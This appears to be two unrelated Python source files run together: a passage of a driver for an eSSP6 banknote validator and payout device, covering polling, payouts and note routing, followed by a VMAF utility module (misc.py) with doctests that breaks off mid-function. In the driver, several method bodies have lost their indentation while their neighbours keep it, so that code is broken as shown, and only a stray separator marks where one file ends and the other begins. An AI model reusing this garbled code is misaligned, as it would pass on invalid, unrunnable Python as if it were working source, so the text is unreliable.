self.print_debug("Validator Found !")
# Try to setup encryption
if self.essp.ssp6_setup_encryption(self.sspC, c_ulonglong(
0x123456701234567)) == Status.SSP_RESPONSE_OK.value:
self.print_debug("Encryption Setup")
else:
self.print_debug("Encryption Failed")
# Checking the version, make sure we are using ssp version 6
if self.essp.ssp6_host_protocol(
self.sspC, 0x06) != Status.SSP_RESPONSE_OK.value:
self.print_debug(self.essp.ssp6_host_protocol(self.sspC, 0x06))
self.print_debug("Host Protocol Failed")
self.close()
raise Exception("Host Protocol Failed")
# Get some information about the validator
if self.essp.ssp6_setup_request(self.sspC, byref(
setup_req)) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Setup Request Failed")
self.close()
raise Exception("Setup request failed")
self.print_debug("Firmware %s " % (setup_req.FirmwareVersion.decode('utf8')))
self.print_debug("Channels : ")
for i, channel in enumerate(setup_req.ChannelData):
self.print_debug("Channel %s : %s %s" %
(str(i + 1), str(channel.value), channel.cc.decode()))
# Enable the validator
if self.essp.ssp6_enable(self.sspC) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Enable Failed")
self.close()
raise Exception("Enable failed")
if setup_req.UnitType == 0x03: # magic number
for channel in enumerate(setup_req.ChannelData):
self.essp.ssp6_set_coinmech_inhibits(
self.sspC, channel.value, channel.cc, Status.ENABLED.value)
else:
if setup_req.UnitType in {0x06, 0x07}:
# Enable the payout unit
if self.essp.ssp6_enable_payout(
self.sspC, setup_req.UnitType) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Payout Enable Failed")
# Set the inhibits ( enable all note acceptance )
if self.essp.ssp6_set_inhibits(
self.sspC, 0xFF, 0xFF) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Inhibits Failed")
self.close()
raise Exception("Inhibits failed")
system_loop_thread = threading.Thread(target=self.system_loop)
system_loop_thread.setDaemon(True)
system_loop_thread.start()
    def close(self):
        """Close the connection: reject any bill still in the bezel first,
        then release the SSP serial port."""
        self.reject()
        self.essp.close_ssp_port()
    def reject(self):
        """Reject the bill currently held by the validator, if any."""
        # NOTE(review): unlike __init__, this compares the int return against
        # the enum member itself (no .value) -- only correct if Status is an
        # IntEnum; confirm in .constants.
        if self.essp.ssp6_reject(self.sspC) != Status.SSP_RESPONSE_OK:
            self.print_debug("Error to reject bill OR nothing to reject")
    def do_actions(self):
        """Drain the action queue and execute each queued command against the
        device. Arguments for each command are read from self.actions_args
        (filled by __action_helper); results, where any, are published into
        self.response_data. Called from system_loop between polls.

        NOTE(review): return-code comparisons here omit `.value` (unlike
        __init__); correct only if Status is an IntEnum -- confirm.
        """
        while not self.actions.empty():
            action = self.actions.get()  # get and delete
            self.print_debug(action.debug_message)
            if action == Actions.ROUTE_TO_CASHBOX:  # Route to cashbox
                if self.essp.ssp6_set_route(
                        self.sspC,
                        self.actions_args['routec_amount'],
                        self.actions_args['routec_currency'],
                        Status.ENABLED.value) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Route to cashbox failed")
            elif action == Actions.ROUTE_TO_STORAGE:  # Route to storage
                if self.essp.ssp6_set_route(
                        self.sspC,
                        self.actions_args['routes_amount'],
                        self.actions_args['routes_currency'],
                        Status.DISABLED.value) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Route to storage failed")
            elif action == Actions.PAYOUT:  # Payout
                if self.essp.ssp6_payout(
                        self.sspC,
                        self.actions_args['payout_amount'],
                        self.actions_args['payout_currency'],
                        Status.SSP6_OPTION_BYTE_DO.value) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Payout failed")
                    # Checking the error
                    # NOTE(review): `self.essp.Status.SSP_get_response_data`
                    # looks odd (Status attribute on the C library) -- verify
                    # this attribute path actually resolves at runtime.
                    response_data = cast(
                        self.essp.Status.SSP_get_response_data(
                            self.sspC), POINTER(c_ubyte))
                    if response_data[1] == Status.SMART_PAYOUT_NOT_ENOUGH:
                        self.print_debug(Status.SMART_PAYOUT_NOT_ENOUGH)
                    elif response_data[1] == Status.SMART_PAYOUT_EXACT_AMOUNT:
                        self.print_debug(Status.SMART_PAYOUT_EXACT_AMOUNT)
                    elif response_data[1] == Status.SMART_PAYOUT_BUSY:
                        self.print_debug(Status.SMART_PAYOUT_BUSY)
                    elif response_data[1] == Status.SMART_PAYOUT_DISABLED:
                        self.print_debug(Status.SMART_PAYOUT_DISABLED)
            # Payout next note ( NV11 only )
            elif action == Actions.PAYOUT_NEXT_NOTE_NV11:
                self.print_debug("Payout next note")
                setup_req = Ssp6SetupRequestData()
                if self.essp.ssp6_setup_request(self.sspC, byref(
                        setup_req)) != Status.SSP_RESPONSE_OK:
                    self.print_debug("Setup Request Failed")
                # Maybe the version, or something ( taken from the SDK C code
                # )
                if setup_req.UnitType != 0x07:
                    self.print_debug("Payout next note is only valid for NV11")
                if self.essp.ssp6_payout_note(
                        self.sspC) != Status.SSP_RESPONSE_OK:
                    self.print_debug("Payout next note failed")
            # Stack next note ( NV11 only )
            elif action == Actions.STACK_NEXT_NOTE_NV11:
                setup_req = Ssp6SetupRequestData()
                if self.essp.ssp6_setup_request(self.sspC, byref(
                        setup_req)) != Status.SSP_RESPONSE_OK:
                    self.print_debug("Setup Request Failed")
                # Maybe the version, or something ( taken from the SDK C code
                # )
                if setup_req.UnitType != 0x07:
                    self.print_debug("Payout next note is only valid for NV11")
                if self.essp.ssp6_stack_note(
                        self.sspC) != Status.SSP_RESPONSE_OK:
                    self.print_debug("Stack next note failed")
            elif action == Actions.DISABLE_VALIDATOR:  # Disable the validator
                if self.essp.ssp6_disable(
                        self.sspC) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Disable failed")
            elif action == Actions.DISABLE_PAYOUT:  # Disable the payout device
                if self.essp.ssp6_disable_payout(
                        self.sspC) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Disable payout failed")
            elif action == Actions.GET_NOTE_AMOUNT:  # Get the note amount
                if self.essp.ssp6_get_note_amount(
                        self.sspC,
                        self.actions_args['getnoteamount_amount'],
                        self.actions_args['getnoteamount_currency']) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Can't read the note amount")
                    # There can't be 9999 notes: error sentinel
                    self.response_data['getnoteamount_response'] = 9999
                else:
                    response_data = cast(
                        self.essp.Status.SSP_get_response_data(
                            self.sspC), POINTER(c_ubyte))
                    self.print_debug(response_data[1])
                    # The number of note
                    self.response_data['getnoteamount_response'] = response_data[1]
            # Empty the storage ( Send all to the cashbox )
            elif action == Actions.EMPTY_STORAGE:
                if self.essp.ssp6_empty(
                        self.sspC) != Status.SSP_RESPONSE_OK:
                    self.print_debug("ERROR: Can't empty the storage")
                else:
                    self.print_debug("Emptying, please wait...")
            else:
                self.print_debug("Unknow action")
def print_debug(self, text):
if self.debug:
print(text)
    def enable_validator(self):
        """Re-enable the validator and restore its inhibit configuration.

        Returns False on failure; returns None (not True) on success.
        """
        setup_req = Ssp6SetupRequestData()
        if self.essp.ssp6_enable(self.sspC) != Status.SSP_RESPONSE_OK:
            self.print_debug("ERROR: Enable failed")
            return False
        # SMART Hopper requires different inhibit commands, so use setup
        # request to see if it is an SH
        if self.essp.ssp6_setup_request(self.sspC, byref(
                setup_req)) != Status.SSP_RESPONSE_OK:
            self.print_debug("Setup request failed")
            return False
        if setup_req.UnitType == 0x03:  # Magic number: SMART Hopper
            # SMART Hopper requires different inhibit commands
            for channel in setup_req.ChannelData:
                self.essp.ssp6_set_coinmech_inhibits(
                    self.sspC, channel.value, channel.cc, Status.ENABLED.value)
        else:
            if self.essp.ssp6_set_inhibits(
                    self.sspC, 0xFF, 0xFF) != Status.SSP_RESPONSE_OK:  # Magic numbers here too
                self.print_debug("Inhibits Failed")
                self.close()
                raise Exception("Inhibits failed")
def parse_poll(self):
"""Parse the poll, for getting events"""
for events in self.poll.events:
try:
if events.event == Status.DISABLED:
pass # We don't print anything
else:
self.print_debug(Status(events.event))
except ValueError:
self.print_debug('Unknown status: {}'.format(events.event))
if events.event == Status.SSP_POLL_RESET:
if self.essp.ssp6_host_protocol(
self.sspC, 0x06) != Status.SSP_RESPONSE_OK: # Magic number
raise Exception("Host Protocol Failed")
self.close()
elif events.event == Status.SSP_POLL_READ:
if events.data1 > 0:
self.print_debug(
"Note Read %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_CREDIT:
self.print_debug(
"Credit %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_INCOMPLETE_PAYOUT:
self.print_debug(
"Incomplete payout %s of %s %s" %
(events.data1, events.data2, events.cc.decode()))
elif events.event == Status.SSP_POLL_INCOMPLETE_FLOAT:
self.print_debug(
"Incomplete float %s of %s %s" %
(events.data1, events.data2, events.cc.decode()))
elif events.event == Status.SSP_POLL_FRAUD_ATTEMPT:
self.print_debug(
"Fraud Attempt %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_CALIBRATION_FAIL:
self.print_debug("Calibration fail :")
self.print_debug(FailureStatus(events.data1))
if events.data1 == Status.COMMAND_RECAL:
self.print_debug("trying to run autocalibration")
self.essp.ssp6_run_calibration(self.sspC)
self.events.append((0, 0, events.event))
self.events.append((0, 0, Status.NO_EVENT))
def system_loop(self): # Looping for getting the alive signal ( obligation in eSSP6 )
while True:
rsp_status = self.essp.ssp6_poll(
self.sspC, byref(self.poll)) # Get the pool
if rsp_status != Status.SSP_RESPONSE_OK: # If there's a problem, check wath is it
if rsp_status == Status.SSP_RESPONSE_TIMEOUT: # Timeout
self.print_debug("SSP Poll Timeout")
self.close()
exit(0)
else:
if rsp_status == 0xFA:
# The self has responded with key not set, so we should
# try to negotiate one
if self.essp.ssp6_setup_encryption(self.sspC, c_ulonglong(
0x123456701234567)) == Status.SSP_RESPONSE_OK:
self.print_debug("Encryption Setup")
else:
self.print_debug("Encryption Failed")
else:
# Not theses two, stop the program
raise Exception("SSP Poll Error {}".format(rsp_status))
exit(1)
self.parse_poll()
self.do_actions()
sleep(0.5)
def get_last_event(self):
"""Get the last event and delete it from the event list"""
event = self.events[len(self.events) - 1]
self.events.pop(len(self.events) - 1)
return event
def __action_helper(self, amount, currency, action, prefix):
self.actions.put(action)
self.actions_args['{}_amount'.format(prefix)] = amount * 100
# TODO: This is one action at time, also,
# i think that the validator can receive one type of command at time,
# so TO IMPLEMENT: user can send multiple request without waiting,
# but we store them and process them every time we send commands to the
# validator ( 0.5, 0.5, 0.5, etc. )
self.actions_args['{}_currency'.format(
prefix)] = currency.upper().encode()
    def set_route_cashbox(self, amount, currency="CHF"):
        """Will set the route of <amount> in the cashbox
        NV11: Will set the route of <= amount in the cashbox"""
        # Asynchronous: queued here, executed later by system_loop/do_actions.
        self.__action_helper(
            amount,
            currency,
            Actions.ROUTE_TO_CASHBOX,
            "routec")
    def set_route_storage(self, amount, currency="CHF"):
        """Set the bills <amount> in the storage
        NV11: Set the bills <= amount in the storage"""
        # Asynchronous: queued here, executed later by system_loop/do_actions.
        self.__action_helper(amount, currency, Actions.ROUTE_TO_STORAGE, "routes")
    def payout(self, amount, currency="CHF"):
        """Payout note(s) for completing the amount passed in parameter
        (queued; executed by the system loop)."""
        self.__action_helper(amount, currency, Actions.PAYOUT, "payout")
    def get_note_amount(self, amount, currency="CHF"):
        """Get the numbers of note of value X in the smart payout device.
        Result is published later in response_data['getnoteamount_response']
        (9999 = error/no data)."""
        self.__action_helper(
            amount,
            currency,
            Actions.GET_NOTE_AMOUNT,
            "getnoteamount")
    def reset(self):
        """Reset the device (synchronous C call, not queued)."""
        self.print_debug("Starting reset")
        self.essp.ssp6_reset(self.sspC)
        self.print_debug("Reset complet")
    def nv11_payout_next_note(self):
        # Queue a "payout next note" command (NV11 only; checked in do_actions).
        self.actions.put(Actions.PAYOUT_NEXT_NOTE_NV11)
    def nv11_stack_next_note(self):
        # Queue a "stack next note" command (NV11 only; checked in do_actions).
        self.actions.put(Actions.STACK_NEXT_NOTE_NV11)
    def empty_storage(self):
        # Queue a command that sends everything in storage to the cashbox.
        self.actions.put(Actions.EMPTY_STORAGE)
    def disable_payout(self):
        # Queue a command disabling the payout device.
        self.actions.put(Actions.DISABLE_PAYOUT)
    def disable_validator(self):
        # Queue a command disabling the validator.
        self.actions.put(Actions.DISABLE_VALIDATOR)
|
misc.py | import subprocess
import unittest
from fnmatch import fnmatch
import multiprocessing
from time import sleep, time
import itertools
from pathlib import Path
import numpy as np
import sys
import errno
import os
from vmaf import run_process
from vmaf.tools.scanf import sscanf, IncompleteCaptureError, FormatError
__copyright__ = "Copyright 2016-2020, Netflix, Inc."
__license__ = "BSD+Patent"
try:
unicode # noqa, remove this once python2 support is dropped
except NameError:
unicode = str
try:
multiprocessing.set_start_method('fork')
except ValueError: # noqa, If platform does not support, just ignore
pass
def get_stdout_logger():
    """Return the root logger, set to DEBUG, with a stdout stream handler
    attached. Note: each call attaches one more handler to the root logger."""
    import logging
    root = logging.getLogger()
    root.setLevel(logging.DEBUG)
    root.addHandler(logging.StreamHandler(stream=sys.stdout))
    return root
def close_logger(logger):
    """Close and detach every handler attached to *logger*.

    BUGFIX: iterate over a snapshot of the handler list. Removing handlers
    while iterating ``logger.handlers`` directly skipped every other handler,
    leaving half of them attached.
    """
    for handler in list(logger.handlers):
        handler.close()
        logger.removeHandler(handler)
def get_file_name_without_extension(path):
    """Return the final path component with its last extension removed.

    >>> get_file_name_without_extension('yuv/src01_hrc01.yuv')
    'src01_hrc01'
    >>> get_file_name_without_extension('yuv/src01_hrc01')
    'src01_hrc01'
    >>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.dvi.yuv')
    'src01_hrc01.sdr.dvi'
    """
    p = Path(path)
    # name minus its suffix == stem; only the last extension is stripped
    return p.name[:-len(p.suffix)] if p.suffix else p.name
def get_file_name_with_extension(path):
    """Return the final path component, extension included.

    >>> get_file_name_with_extension('yuv/src01_hrc01.yuv')
    'src01_hrc01.yuv'
    >>> get_file_name_with_extension('src01_hrc01.yuv')
    'src01_hrc01.yuv'
    >>> get_file_name_with_extension('abc/xyz/src01_hrc01.yuv')
    'src01_hrc01.yuv'
    """
    return Path(path).name
def get_file_name_extension(path):
    '''Return the last extension of *path* without the leading dot
    ('' when there is none).

    >>> get_file_name_extension("file:///mnt/zli/test.txt")
    'txt'
    >>> get_file_name_extension("test.txt")
    'txt'
    >>> get_file_name_extension("abc")
    ''
    >>> get_file_name_extension("test.265")
    '265'
    '''
    suffix = Path(path).suffix
    # suffix includes the dot; drop it (slicing '' is still '')
    return suffix[1:]
def get_normalized_path(dir_):
    """Strip a single trailing '/' from *dir_*, if present.

    >>> get_normalized_path('abc/xyz/')
    'abc/xyz'
    >>> get_normalized_path('abc/xyz')
    'abc/xyz'
    >>> get_normalized_path('abc/xyz.txt')
    'abc/xyz.txt'
    """
    # indexing (not .endswith) preserves the original IndexError on ''
    return dir_[:-1] if dir_[-1] == '/' else dir_
def get_dir_without_last_slash(path):
    """Return everything before the last '/' in *path* ('' when there is none).

    >>> get_dir_without_last_slash('abc/src01_hrc01.yuv')
    'abc'
    >>> get_dir_without_last_slash('src01_hrc01.yuv')
    ''
    >>> get_dir_without_last_slash('abc/xyz/src01_hrc01.yuv')
    'abc/xyz'
    >>> get_dir_without_last_slash('abc/xyz/')
    'abc/xyz'
    """
    head, _sep, _tail = path.rpartition('/')
    return head
def make_parent_dirs_if_nonexist(path):
    """Create the parent directory of *path* (no-op if it already exists).

    NOTE(review): if *path* contains no '/', the derived dir is '' and
    os.makedirs('') raises -- confirm callers always pass a path with a dir.
    """
    dst_dir = get_dir_without_last_slash(path)
    os.makedirs(dst_dir, exist_ok=True)
def delete_dir_if_exists(dir):
    """Remove *dir* when it is an existing directory; otherwise do nothing.
    (os.rmdir still raises if the directory is not empty.)"""
    if not os.path.isdir(dir):
        return
    os.rmdir(dir)
def get_normalized_string_from_dict(d):
    """Normalized string representation with sorted keys.

    >>> get_normalized_string_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
    'bitrate_kbps_45_max_buffer_sec_5.0'
    """
    parts = [f'{key}_{d[key]}' for key in sorted(d)]
    return '_'.join(parts)
def get_hashable_value_tuple_from_dict(d):
    """Hashable tuple of values, in sorted-key order (lists become tuples).

    >>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
    (45, 5.0)
    >>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, "resolutions": [(740, 480), (1920, 1080), ]})
    (45, 5.0, ((740, 480), (1920, 1080)))
    """
    return tuple(
        tuple(d[key]) if isinstance(d[key], list) else d[key]
        for key in sorted(d)
    )
def get_unique_str_from_recursive_dict(d):
    """JSON string with recursively sorted dict keys (dicts only; lists are
    left in their original order).

    >>> get_unique_str_from_recursive_dict({'a':1, 'b':2, 'c':{'x':'0', 'y':'1'}})
    '{"a": 1, "b": 2, "c": {"x": "0", "y": "1"}}'
    >>> get_unique_str_from_recursive_dict({'a':1, 'c':2, 'b':{'y':'1', 'x':'0', }})
    '{"a": 1, "b": {"x": "0", "y": "1"}, "c": 2}'
    """
    import json

    def _sorted_deep(node):
        # plain dicts preserve insertion order (3.7+), so rebuilding in
        # sorted-key order is enough -- no OrderedDict needed
        if not isinstance(node, dict):
            return node
        return {key: _sorted_deep(node[key]) for key in sorted(node)}

    return json.dumps(_sorted_deep(d))
def indices(a, func):
    """
    Get indices of elements in an array which satisfies func
    >>> indices([1, 2, 3, 4], lambda x: x>2)
    [2, 3]
    >>> indices([1, 2, 3, 4], lambda x: x==2.5)
    []
    >>> indices([1, 2, 3, 4], lambda x: x>1 and x<=3)
    [1, 2]
    >>> indices([1, 2, 3, 4], lambda x: x in [2, 4])
    [1, 3]
    >>> indices([1,2,3,1,2,3,1,2,3], lambda x: x > 2)
    [2, 5, 8]
    """
    # map the predicate over the sequence, keep the truthy positions
    return [pos for pos, keep in enumerate(map(func, a)) if keep]
def import_python_file(filepath):
    """
    Import a python file as a module, named after the file's stem.

    :param filepath: path to the .py file to load
    :return: the loaded module object

    NOTE(review): SourceFileLoader.load_module() is deprecated (and the `imp`
    fallback removed in 3.12) -- migrating to importlib.util.spec_from_file_location
    would change sys.modules registration behavior; confirm before changing.
    """
    filename = get_file_name_without_extension(filepath)
    try:
        from importlib.machinery import SourceFileLoader
        ret = SourceFileLoader(filename, filepath).load_module()
    except ImportError:
        # legacy interpreter fallback
        import imp
        ret = imp.load_source(filename, filepath)
    return ret
def make_absolute_path(path, current_dir):
    '''Prefix *path* with *current_dir* unless it is already absolute.

    >>> make_absolute_path('abc/cde.fg', '/xyz/')
    '/xyz/abc/cde.fg'
    >>> make_absolute_path('/abc/cde.fg', '/xyz/')
    '/abc/cde.fg'
    '''
    # indexing (not .startswith) preserves the original IndexError on ''
    return path if path[0] == '/' else current_dir + path
def empty_object():
    """Return a fresh instance of an anonymous (empty-named) class, usable as
    a mutable attribute bag."""
    anon_cls = type('', (), {})
    return anon_cls()
def get_cmd_option(argv, begin, end, option):
    '''Return the argv entry following the first occurrence of *option*
    within [begin, end), or None if absent or if the value would fall
    outside the window.

    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 3, 5, '--xyz')
    '123'
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, '--xyz')
    '123'
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 4, 5, '--xyz')
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 5, 5, '--xyz')
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 6, 5, '--xyz')
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'a')
    'b'
    >>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'b')
    'c'
    '''
    for pos in range(begin, end):
        if argv[pos] == option:
            # the value must itself lie inside the [begin, end) window
            return argv[pos + 1] if pos + 1 != end else None
    return None
def cmd_option_exists(argv, begin, end, option):
    '''True when *option* occurs in argv within [begin, end).

    >>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'c')
    True
    >>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'c')
    False
    >>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'd')
    True
    >>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'a')
    False
    >>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'b')
    False
    '''
    return any(argv[pos] == option for pos in range(begin, end))
def index_and_value_of_min(l):
    '''Return (index, value) of the smallest element (first one on ties).

    >>> index_and_value_of_min([2, 0, 3])
    (1, 0)
    '''
    best_pair = min(enumerate(l), key=lambda pair: pair[1])
    return best_pair
def parallel_map(func, list_args, processes=None):
    """
    Build my own parallelized map function since multiprocessing's Process(),
    or Pool.map() cannot meet my both needs:
    1) be able to control the maximum number of processes in parallel
    2) be able to take in non-picklable objects as arguments

    Results are returned in the order of list_args. Relies on the 'fork'
    start method (set at module import) so arguments need not be picklable.
    NOTE(review): completion order is not tracked, so a crashed child simply
    leaves its slot missing and the final collection would KeyError -- verify
    this is acceptable for callers.
    """
    # get maximum number of active processes that can be used
    max_active_procs = processes if processes is not None else multiprocessing.cpu_count()
    # create shared dictionary (proxies results back from the children)
    return_dict = multiprocessing.Manager().dict()
    # define runner function
    def func_wrapper(idx_args):
        idx, args = idx_args
        executor = func(args)
        return_dict[idx] = executor
    # add idx to args
    list_idx_args = []
    for idx, args in enumerate(list_args):
        list_idx_args.append((idx, args))
    procs = []
    for idx_args in list_idx_args:
        proc = multiprocessing.Process(target=func_wrapper, args=(idx_args,))
        procs.append(proc)
    waiting_procs = set(procs)
    active_procs = set([])
    # processing
    while True:
        # check if any procs in active_procs is done; if yes, remove them
        for p in active_procs.copy():
            if not p.is_alive():
                active_procs.remove(p)
        # check if can add a proc to active_procs (add gradually one per loop)
        if len(active_procs) < max_active_procs and len(waiting_procs) > 0:
            # move one proc from waiting_procs to active_procs
            p = waiting_procs.pop()
            active_procs.add(p)
            p.start()
        # if both waiting_procs and active_procs are empty, can terminate
        if len(waiting_procs) == 0 and len(active_procs) == 0:
            break
        sleep(0.01) # check every x sec
    # finally, collect results in input order
    rets = list(map(lambda idx: return_dict[idx], range(len(list_args))))
    return rets
def check_program_exist(program):
    '''
    Return True if *program* (a command line, split on whitespace) can be
    launched, False when the executable does not exist.

    Warning: this actually RUNS the command, so only probe side-effect-free
    programs.

    >>> check_program_exist("xxxafasd34df")
    False
    >>> check_program_exist("xxxafasd34df f899")
    False
    >>> check_program_exist("ls")
    True
    >>> check_program_exist("ls -all")
    True
    >>> check_program_exist("pwd")
    True
    '''
    try:
        # BUGFIX: subprocess.DEVNULL replaces open(os.devnull, 'wb'), whose
        # file object was never closed (leaked one fd per call).
        subprocess.call(program.split(), stdout=subprocess.DEVNULL)
        return True
    except OSError as e:
        if e.errno == errno.ENOENT:
            # executable not found
            return False
        else:
            # Something else went wrong while trying to run the program
            raise
def check_scanf_match(string, template):
    '''
    Return True when *string* matches *template*, first by scanf-style
    parsing (sscanf), then falling back to shell-style globbing (fnmatch).

    >>> check_scanf_match('frame00000000.icpf', 'frame%08d.icpf')
    True
    >>> check_scanf_match('frame00000003.icpf', 'frame%08d.icpf')
    True
    >>> check_scanf_match('frame0000001.icpf', 'frame%08d.icpf')
    True
    >>> check_scanf_match('frame00000001.icpff', 'frame%08d.icpf')
    True
    >>> check_scanf_match('gframe00000001.icpff', 'frame%08d.icpf')
    False
    >>> check_scanf_match('fyrame00000001.icpff', 'frame%08d.icpf')
    False
    >>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy/frame%08d.icpf')
    True
    >>> check_scanf_match('xx/yy//frame00000000.icpf', 'xx/yy/frame%08d.icpf')
    False
    >>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy//frame%08d.icpf')
    False
    >>> check_scanf_match("-1-2+3-4", "%02d%02d%02d%02d")
    True
    >>> check_scanf_match('frame00000240.icpf', 'frame%08d.icpf')
    True
    >>> check_scanf_match('/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_30.yuv.avi', '/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_*.yuv.avi')
    True
    '''
    # Fix: removed the dead local `ret = False` that was assigned but never
    # used; the control flow is otherwise unchanged.
    try:
        sscanf(string, template)
        return True
    except (FormatError, IncompleteCaptureError):
        pass
    # fall back to glob matching (handles '*' wildcards in the template)
    if fnmatch(string, template):
        return True
    return False
def match_any_files(template):
    """Return True when any file in the template's directory matches
    *template* (scanf- or glob-style, via check_scanf_match)."""
    dir_ = os.path.dirname(template)
    return any(
        check_scanf_match(dir_ + '/' + filename, template)
        for filename in os.listdir(dir_)
    )
def unroll_dict_of_lists(dict_of_lists):
    """ Unfold a dictionary of lists into a list of dictionaries
    (the Cartesian product over the per-key value lists, keys in sorted order).

    >>> dict_of_lists = {'norm_type':['normalize'], 'n_estimators':[10, 50], 'random_state': [0]}
    >>> expected = [{'n_estimators': 10, 'norm_type': 'normalize', 'random_state': 0}, {'n_estimators': 50, 'norm_type': 'normalize', 'random_state': 0}]
    >>> unroll_dict_of_lists(dict_of_lists) == expected
    True
    """
    # one list of (key, value) pairs per key, keys normalized to sorted order
    per_key_pairs = [
        [(key, value) for value in dict_of_lists[key]]
        for key in sorted(dict_of_lists.keys())
    ]
    # every combination picks one pair per key
    return [dict(combo) for combo in itertools.product(*per_key_pairs)]
def neg_if_even(x):
    """Return -1 for even *x*, +1 for odd *x*.

    >>> neg_if_even(2)
    -1
    >>> neg_if_even(1)
    1
    >>> neg_if_even(0)
    -1
    >>> neg_if_even(-1)
    1
    >>> neg_if_even(-2)
    -1
    """
    return -1 if x % 2 == 0 else 1
def get_unique_sorted_list(l):
    """Return the distinct elements of *l* as a sorted list.

    >>> get_unique_sorted_list([3, 4, 4, 1])
    [1, 3, 4]
    >>> get_unique_sorted_list([])
    []
    """
    return sorted(set(l))
class Timer(object):
    """Context manager that prints elapsed wall-clock seconds on exit.

    Note: __enter__ returns None, so ``with Timer() as t`` binds t = None.
    """
    def __enter__(self):
        self.tstart = time()
    def __exit__(self, type, value, traceback):
        # `type` shadows the builtin; kept for signature compatibility
        print('Elapsed: %s sec' % (time() - self.tstart))
def dedup_value_in_dict(d):
    """Keep only the first (by sorted key order) key for each distinct value.

    >>> dedup_value_in_dict({'a': 1, 'b': 1, 'c': 2}) == {'a': 1, 'c': 2}
    True
    """
    first_key_for_value = {}
    for key in sorted(d):
        # setdefault keeps the earliest key seen for this value
        first_key_for_value.setdefault(d[key], key)
    return {key: value for value, key in first_key_for_value.items()}
class MyTestCase(unittest.TestCase):
    """TestCase that collects assertAlmostEqual failures instead of aborting
    at the first one; all collected failures are reported in tearDown."""
    def setUp(self):
        # accumulated AssertionError messages from assertAlmostEqual
        self.verificationErrors = []
        self.maxDiff = None
    def tearDown(self):
        # fail the test if anything was collected during the run
        self.assertEqual([], self.verificationErrors)
    def assertAlmostEqual(self, first, second, places=None, msg=None, delta=None):
        # record the failure and keep going rather than raising immediately
        try:
            super().assertAlmostEqual(first, second, places, msg, delta)
        except AssertionError as e:
            self.verificationErrors.append(str(e))
class QualityRunnerTestMixin(object):
    """Mixin for quality-runner test cases: run a runner over a single asset
    (serially, no result store) and check its score to 5 decimal places."""
    def run_each(self, score, runner_class, asset, optional_dict):
        # parallelize=False so failures surface deterministically
        runner = runner_class(
            [asset],
            None,
            fifo_mode=False,
            delete_workdir=True,
            result_store=None,
            optional_dict=optional_dict,
        )
        runner.run(parallelize=False)
        results = runner.results
        self.assertAlmostEqual(results[0][runner_class.get_score_key()], score, places=5)
def find_linear_function_parameters(p1, p2):
    """
    Find parameters (alpha, beta) of the linear function y = alpha*x + beta
    connecting first_point and second_point.

    BUGFIX: the previous general-case intercept, beta = p2[1]*(p1[1]-p1[0]) /
    (p2[0]-p1[0]), only yields the line through both points when p2 lies on
    y == x (which both original doctests happened to satisfy). Replaced by
    the standard two-point form; all documented results are unchanged.

    >>> find_linear_function_parameters((1, 1), (0, 0))
    Traceback (most recent call last):
    ...
    AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
    >>> find_linear_function_parameters((0, 1), (0, 0))
    Traceback (most recent call last):
    ...
    AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
    >>> find_linear_function_parameters((1, 0), (0, 0))
    Traceback (most recent call last):
    ...
    AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
    >>> find_linear_function_parameters((50.0, 30.0), (50.0, 100.0))
    Traceback (most recent call last):
    ...
    AssertionError: first_point and second_point cannot lie on a horizontal or vertical line
    >>> find_linear_function_parameters((50.0, 30.0), (100.0, 30.0))
    Traceback (most recent call last):
    ...
    AssertionError: first_point and second_point cannot lie on a horizontal or vertical line
    >>> find_linear_function_parameters((50.0, 20.0), (110.0, 110.0))
    (1.5, -55.0)
    >>> a, b = find_linear_function_parameters((50.0, 30.0), (110.0, 110.0))
    >>> np.testing.assert_almost_equal(a, 1.333333333333333)
    >>> np.testing.assert_almost_equal(b, -36.666666666666664)
    >>> find_linear_function_parameters((50.0, 30.0), (50.0, 30.0))
    (1, 0)
    """
    assert len(p1) == 2, 'first_point needs to have exactly 2 coordinates'
    assert len(p2) == 2, 'second_point needs to have exactly 2 coordinates'
    assert p1[0] <= p2[0] and p1[1] <= p2[1], \
        'first_point coordinates need to be smaller or equal to second_point coordinates'
    if p2[0] - p1[0] == 0 or p2[1] - p1[1] == 0:
